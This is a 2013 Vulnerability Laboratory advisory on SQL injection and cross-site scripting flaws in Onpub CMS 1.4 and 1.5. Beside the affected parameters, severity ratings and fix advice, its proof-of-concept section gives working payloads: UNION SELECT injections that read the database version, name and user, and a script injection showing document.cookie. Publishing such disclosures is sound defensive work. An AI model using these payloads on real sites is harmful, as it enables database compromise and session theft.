213 lines
9.1 KiB
Text
Executable file
213 lines
9.1 KiB
Text
Executable file
Document Title:
|
|
===============
|
|
Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
http://www.vulnerability-lab.com/get_content.php?id=1120
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2013-10-26
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
1120
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
8.2
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
|
|
looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
|
|
stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub`s default
|
|
design and functionality via open-standard web development tools and techniques.
|
|
|
|
Onpub is ideal for those with no desire to implement a CMS from scratch, but still need a custom, yet agile solution.
|
|
Onpub tightly integrates many widely used third-party web apps and scripts in to one coherent system to build further upon.
|
|
|
|
( Copy of the Vendor Homepage: http://onpub.com/ )
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application.
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2013-10-26: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Onpub
|
|
Product: Onpub - Content Management System 1.4 Lite and 1.5
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
Critical
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
1.1
|
|
Multiple remote sql injection web vulnerabilities are detected in the official in the Onpub v1.4 and 1.5 Content Management System web-application.
|
|
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms.
|
|
|
|
The sql injection vulnerabilities are located in the `websiteID`,`imageID`,`keywords`,`orderBy`,`order` and `articleID` values of the index.php file.
|
|
Remote attackers are able to inject own sql commands via GET method request to compromise the database management system or cms web-application.
|
|
The inject can be done by usage of the manage path via GET method request or by usage of the articleID in the index.php file POST method request.
|
|
The severity of the remote sql injection bugs is estimated as critical.
|
|
|
|
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
|
|
Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] Manage
|
|
|
|
Vulnerable File(s):
|
|
[+] index.php
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] websiteID
|
|
[+] imageID
|
|
[+] keywords
|
|
[+] orderBy
|
|
[+] order
|
|
[+] articleID
|
|
|
|
|
|
|
|
2.1
|
|
A client-side post inject web vulnerability is detected in the official in the Onpub v1.4 and v1.5 Content Management System web-application.
|
|
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side).
|
|
|
|
The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module).
|
|
Remote attackers can manipulate the `page` parameter in the `index.php` file via GET method request to compromise client-side application context.
|
|
|
|
Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing,
|
|
client-side unauthorized external redirects and client-side manipulation of the contact formular module context.
|
|
|
|
|
|
Vulnerable Module(s):
|
|
[+] Manage
|
|
|
|
Vulnerable File(s):
|
|
[+] index.php
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] page
|
|
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
1.1
|
|
The sql injection web vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction.
|
|
For demonstration or to reproduce ...
|
|
|
|
PoC:
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION VULNERABILITY!]&order=ASC
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&orderBy=title&order=[SQL-INJECTION VULNERABILITY!]
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImage&imageID=2%27a[SQL-INJECTION VULNERABILITY!]
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticle&articleID=1%20[SQL-INJECTION VULNERABILITY!]
|
|
|
|
|
|
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@version--
|
|
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@database--
|
|
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@user--
|
|
|
|
|
|
|
|
|
|
|
|
2.1
|
|
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account
|
|
and with low user interaction click. For demonstration or to reproduce ...
|
|
|
|
|
|
PoC:
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=2%27%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
|
|
|
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=137%20>"<iframe%20src=http://www.vulnerability-lab.com>
|
|
|
|
|
|
Solution - Fix & Patch:
|
|
=======================
|
|
1.1
|
|
Parse in the index.php file the vulnerable `websiteID`,`imageID`,`keywords`,`articleID`,`orderBy`,`order` parameters.
|
|
Use the mysql_real_escape_string() or a prepared statement to prevent sql injection attacks.
|
|
|
|
2.1
|
|
Parse or encode the vulnerable page parameter in the index.php file to prevent client-side cross site scripting attacks.
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
1.1
|
|
The security risk of the remote sql injection web vulnerabilities are estimated as critical.
|
|
|
|
1.2
|
|
The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability Laboratory [Research Team] - Marcel Bernhardt (smash@evolution-sec.com)
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
|
or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
|
DOMAIN: www.vulnerability-lab.com
|
|
CONTACT: research@vulnerability-lab.com
|
|
|
|
|